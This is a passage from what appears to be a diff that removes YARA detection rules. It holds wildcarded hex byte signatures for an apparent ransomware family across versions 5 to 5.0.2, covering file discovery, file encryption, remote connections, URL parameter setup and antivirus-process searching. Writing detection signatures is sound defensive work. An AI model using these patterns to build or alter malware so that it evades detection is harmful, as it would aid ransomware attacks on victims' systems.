-            ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D 0C 41 8B 45 ??
-            81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07 33 C9 66 39 08
-            74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 68 ??
-            ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 85 DB 75 ??
-            68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
-        }
-		$find_files_v5 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
-            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
-            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
-            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
-            6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF
-            15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
-            85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ??
-            ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE
-            E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ??
-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ??
-            ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$crypt_files_v5 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
-            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? FF 75
-            ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? EB ??
-            33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB
-            ?? 75 ?? 33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15
-            ?? ?? ?? ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 21 7D ?? 21 7D ?? 41 89 45 ??
-            8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ??
-            89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A
-            ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ??
-            83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33
-            C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75
-            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ??
-            8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86
-            ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33 C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D
-            ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ??
-            ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ??
-            E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ??
-            85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ??
-            ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ??
-            ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45
-            ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF
-            70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B
-            8B E5 5D C3
-        }
-		$remote_connection_v5 = {
-            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
-            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
-            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
-            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
-            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF
-            15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B
-            E5 5D C2
-        }
-		$remote_connection_v5_0_1 = {
-            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
-            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
-            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
-            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
-            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45
-            F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
-        }
-		$url_parameters_setup_v5 = {
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
-            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
-            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B E5 5D C3
-        }
-		$url_parameters_setup_v5_0_1 = {
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
-            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
-            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B E5 5D C3
-        }
-		$crypt_files_v5_0_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
-            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ??
-            ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0
-            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
-            ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68
-            ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
-            81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ??
-            ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57
-            C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55
-            ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68
-            ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ??
-            ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ??
-            ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ??
-            ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
-            ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ??
-            ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ??
-            89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ??
-            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75
-            ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85
-            C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33
-            C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13
-            45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53
-            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B
-            CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ??
-            FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF
-            D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75
-            ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01
-            8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ??
-            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$find_files_v5_0_1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
-            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
-            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
-            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
-            6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF
-            15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
-            85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ??
-            ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE
-            E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ??
-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ??
-            ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$search_antivirus_processes_v5_0_1 = {
-            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ??
-            33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB
-            ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D
-            58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D
-            0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07
-            33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D
-            ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ??
-            ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
-        }
-		$set_url_parameters_v5_0_2 = {
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
-            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
-            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
